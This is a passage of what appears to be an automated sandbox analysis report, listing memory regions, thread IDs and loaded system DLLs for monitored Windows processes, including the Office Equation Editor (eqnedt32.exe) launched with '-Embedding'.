1697 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1698 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1699 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1702 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1703 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1704 start_va = 0xcd60000 end_va = 0xcd6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd60000" filename = "" Region: id = 1705 start_va = 0xcd70000 end_va = 0xcd7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd70000" filename = "" Region: id = 1706 start_va = 0xcdc0000 end_va = 0xcdcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cdc0000" filename = "" Region: id = 1707 start_va = 0xcdc0000 end_va = 0xcdcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cdc0000" filename = "" Region: id = 1708 start_va = 0xcdd0000 end_va = 0xcddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cdd0000" filename = "" Region: id = 1709 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1710 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1711 start_va = 0x12f80000 end_va = 0x132c5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012f80000" filename = "" Region: id = 1712 start_va = 0x165e0000 end_va = 0x1692dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000165e0000" filename = "" Region: id = 1713 start_va = 0x12380000 end_va = 0x125f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012380000" filename = "" Region: id = 1714 start_va = 0x1f980000 end_va = 0x1fc06fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001f980000" filename = "" Region: id = 1715 start_va = 0x1fc10000 end_va = 0x1ff5bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001fc10000" filename = "" Region: id = 1716 start_va = 0x1ff60000 end_va = 0x202a5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ff60000" filename = "" Region: id = 1717 start_va = 0x202b0000 end_va = 0x2052ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000202b0000" filename = "" Region: id = 1718 start_va = 0x20530000 end_va = 0x207abfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000020530000" filename = "" Region: id = 1719 start_va = 0x207b0000 end_va = 0x20af9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000207b0000" filename = "" Region: id = 1720 start_va = 0x20b00000 end_va = 0x20e4bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000020b00000" filename = "" Region: id = 1721 start_va = 0x20e50000 end_va = 0x210cefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000020e50000" filename = "" Region: id = 1722 start_va = 0x210d0000 end_va = 0x21357fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000210d0000" filename = "" Region: id = 1723 start_va = 0x21360000 end_va = 0x216b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000021360000" filename = "" Region: id = 1724 start_va = 0x216c0000 end_va = 0x21a10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000216c0000" filename = "" Region: id = 1725 start_va = 0x21a20000 end_va = 0x21d69fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000021a20000" filename = "" Region: id = 1726 start_va = 0x21d70000 end_va = 0x21ea3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000021d70000" filename = "" Region: id = 1727 start_va = 0xcd50000 end_va = 0xcd52fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd50000" filename = "" Region: id = 1728 start_va = 0xcdc0000 end_va = 0xcdc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cdc0000" filename = "" Region: id = 1729 start_va = 0xcdd0000 end_va = 0xcdd2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cdd0000" filename = "" Region: id = 1730 start_va = 0xcf30000 end_va = 0xcf30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf30000" filename = "" Region: id = 1731 start_va = 0xcf40000 end_va = 0xcf40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cf40000" filename = "" Region: id = 1736 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1737 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1738 start_va = 0xcd50000 end_va = 0xcd5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd50000" filename = "" Region: id = 1739 start_va = 0xcdc0000 end_va = 0xcdcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cdc0000" filename = "" Region: id = 1740 start_va = 0xcdd0000 end_va = 0xcdd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cdd0000" filename = "" Region: id = 1741 start_va = 0xcf30000 end_va = 0xcf30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf30000" filename = "" Region: id = 1742 start_va = 0xcf40000 end_va = 0xcf56fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf40000" filename = "" Region: id = 1743 start_va = 0xcf60000 end_va = 0xcf60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf60000" filename = "" Region: id = 1744 start_va = 0xcf70000 end_va = 0xcf70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf70000" filename = "" Region: id = 1745 start_va = 0xcf80000 end_va = 0xcf82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf80000" filename = "" Region: id = 1746 start_va = 0xcf90000 end_va = 0xcf92fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf90000" filename = "" Region: id = 1747 start_va = 0xcfa0000 end_va = 0xcfa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cfa0000" filename = "" Region: id = 1748 start_va = 0xcfb0000 end_va = 0xcfb3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cfb0000" filename = "" Region: id = 1749 start_va = 0xcfc0000 end_va = 0xcfc4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cfc0000" filename = "" Region: id = 1750 start_va = 0xcfd0000 end_va = 0xcfd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cfd0000" filename = "" Region: id = 1751 start_va = 0xcfe0000 end_va = 0xcfe2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cfe0000" filename = "" Region: id = 1752 start_va = 0xcff0000 end_va = 0xcff0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cff0000" filename = "" Region: id = 1753 start_va = 0xd000000 end_va = 0xd000fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d000000" filename = "" Region: id = 1754 start_va = 0x11d00000 end_va = 0x11d66fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011d00000" filename = "" Region: id = 1755 start_va = 0x10240000 end_va = 0x10240fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000010240000" filename = "" Region: id = 1756 start_va = 0x10240000 end_va = 0x10240fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000010240000" filename = "" Region: id = 1757 start_va = 0xcd50000 end_va = 0xcd52fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd50000" filename = "" Region: id = 1758 start_va = 0xcdc0000 end_va = 0xcdc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cdc0000" filename = "" Region: id = 1762 start_va = 0xcd50000 end_va = 0xcd52fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd50000" filename = "" Region: id = 1763 start_va = 0xcdc0000 end_va = 0xcdc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cdc0000" filename = "" Region: id = 1767 start_va = 0xcd50000 end_va = 0xcd52fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd50000" filename = "" Region: id = 1768 start_va = 0xcdc0000 end_va = 0xcdc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cdc0000" filename = "" Region: id = 1769 start_va = 0xcdd0000 end_va = 0xcdd2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cdd0000" filename = "" Region: id = 1770 start_va = 0xcf30000 end_va = 0xcf30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf30000" filename = "" Region: id = 1771 start_va = 0xcf30000 end_va = 0xcf96fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cf30000" filename = "" Region: id = 1812 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1813 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1814 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1817 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1818 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1819 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1820 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1821 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1824 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1825 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1829 start_va = 0xcd50000 end_va = 0xcd51fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd50000" filename = "" Region: id = 1840 start_va = 0xcdc0000 end_va = 0xcdd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cdc0000" filename = "" Region: id = 1841 start_va = 0xcdf0000 end_va = 0xcdf2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cdf0000" filename = "" Region: id = 1842 start_va = 0xce00000 end_va = 0xce00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce00000" filename = "" Region: id = 1843 start_va = 0xcd50000 end_va = 0xcd5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1846 start_va = 0xcd50000 end_va = 0xcd52fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd50000" filename = "" Region: id = 1847 start_va = 0xcdc0000 end_va = 0xcdd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cdc0000" filename = "" Region: id = 1848 start_va = 0xcdf0000 end_va = 0xcdf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cdf0000" filename = "" Region: id = 1876 start_va = 0xcd50000 end_va = 0xcd5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Thread: id = 1 os_tid = 0x8b8 Thread: id = 2 os_tid = 0xd50 Thread: id = 3 os_tid = 0x814 Thread: id = 4 os_tid = 0xd5c Thread: id = 5 os_tid = 0x1124 Thread: id = 6 os_tid = 0x704 Thread: id = 7 os_tid = 0x3c0 Thread: id = 8 os_tid = 0xc54 Thread: id = 9 os_tid = 0xd7c Thread: id = 10 os_tid = 0x13f4 Thread: id = 11 os_tid = 0x1384 Thread: id = 12 os_tid = 0x1380 Thread: id = 13 os_tid = 0x1108 Thread: id = 14 os_tid = 0x3b0 Thread: id = 15 os_tid = 0x34c Thread: id = 16 os_tid = 0x115c Thread: id = 17 os_tid = 0x1130 Thread: id = 18 os_tid = 0x75c Thread: id = 19 os_tid = 0x6b4 Thread: id = 20 os_tid = 0x1160 Thread: id = 21 os_tid = 0x1154 Thread: id = 22 os_tid = 0x1140 Thread: id = 23 os_tid = 0x13cc Thread: id = 24 os_tid = 0x13e0 Thread: id = 25 os_tid = 0xec0 Thread: id = 26 os_tid = 0x10e8 Thread: id = 27 os_tid = 0x1190 Thread: id = 28 os_tid = 0x10e0 Thread: id = 51 os_tid = 0x110c Thread: id = 62 os_tid = 0x1260 Thread: id = 63 os_tid = 0x1304 Process: id = "2" image_name = "eqnedt32.exe" filename = "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\equation\\eqnedt32.exe" page_root = "0x28e4b000" os_pid = "0x10d4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x270" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\Root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 746 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 747 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 748 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 749 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 750 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 751 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 752 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 753 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 754 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 755 start_va = 0x400000 end_va = 0x48dfff monitored = 0 entry_point = 0x44cd40 region_type = mapped_file name = "eqnedt32.exe" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\eqnedt32.exe" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\equation\\eqnedt32.exe") Region: id = 756 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 757 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 758 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 759 start_va = 0x7fff0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 760 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 761 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 762 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 763 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 764 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 765 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 766 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 767 start_va = 0x640000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 768 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 769 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 770 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 771 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 772 start_va = 0x490000 end_va = 0x54dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 773 start_va = 0x74810000 end_va = 0x748a1fff monitored = 0 entry_point = 0x74850380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 774 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 775 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 776 start_va = 0x550000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 777 start_va = 0x640000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 778 start_va = 0x830000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 779 start_va = 0x750d0000 end_va = 0x75216fff monitored = 0 entry_point = 0x750e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 780 start_va = 0x77440000 end_va = 0x7758efff monitored = 0 entry_point = 0x774f6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 781 start_va = 0x77b10000 end_va = 0x77b8afff monitored = 0 entry_point = 0x77b2e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 782 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 783 start_va = 0x76c50000 end_va = 0x76c93fff monitored = 0 entry_point = 0x76c69d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 784 start_va = 0x74e80000 end_va = 0x74f2cfff monitored = 0 entry_point = 0x74e94f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 785 start_va = 0x748c0000 end_va = 0x748ddfff monitored = 0 entry_point = 0x748cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 786 start_va = 0x748b0000 end_va = 0x748b9fff monitored = 0 entry_point = 0x748b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 787 start_va = 0x77680000 end_va = 0x776d7fff monitored = 0 entry_point = 0x776c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 788 start_va = 0x74ad0000 end_va = 0x74bbafff monitored = 0 entry_point = 0x74b0d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 789 start_va = 0x752b0000 end_va = 0x7546cfff monitored = 0 entry_point = 0x75392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 790 start_va = 0x75690000 end_va = 0x76a8efff monitored = 0 entry_point = 0x7584b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 791 start_va = 0x76a90000 end_va = 0x76ac6fff monitored = 0 entry_point = 0x76a93b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 792 start_va = 0x76e20000 end_va = 0x77318fff monitored = 0 entry_point = 0x77027610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 793 start_va = 0x77590000 end_va = 0x775d4fff monitored = 0 entry_point = 0x775ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 794 start_va = 0x6cc50000 end_va = 0x6ce04fff monitored = 0 entry_point = 0x6cd43d5a region_type = mapped_file name = "appvisvsubsystems32.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll") Region: id = 795 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 796 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 797 start_va = 0x6cb10000 end_va = 0x6cbdafff monitored = 0 entry_point = 0x6cb26a2b region_type = mapped_file name = "c2r32.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll") Region: id = 798 start_va = 0x6cbe0000 end_va = 0x6cc44fff monitored = 0 entry_point = 0x6cbffa6c region_type = mapped_file name = "appvisvstream32.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll") Region: id = 799 start_va = 0x70950000 end_va = 0x70968fff monitored = 0 entry_point = 0x709547e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 800 start_va = 0x77670000 end_va = 0x7767efff monitored = 0 entry_point = 0x77672e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 801 start_va = 0x77320000 end_va = 0x7732bfff monitored = 0 entry_point = 0x77323930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 802 start_va = 0x775e0000 end_va = 0x7766cfff monitored = 0 entry_point = 0x77629b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 803 start_va = 0x74e20000 end_va = 0x74e63fff monitored = 0 entry_point = 0x74e27410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 804 start_va = 0x688a0000 end_va = 0x68931fff monitored = 0 entry_point = 0x688add60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 805 start_va = 0x590000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 806 start_va = 0x590000 end_va = 0x5b9fff monitored = 0 entry_point = 0x595680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 807 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 808 start_va = 0x930000 end_va = 0xab7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 809 start_va = 0x75660000 end_va = 0x7568afff monitored = 0 entry_point = 0x75665680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 810 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 811 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 812 start_va = 0x740000 end_va = 0x7d0fff monitored = 0 entry_point = 0x778cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") 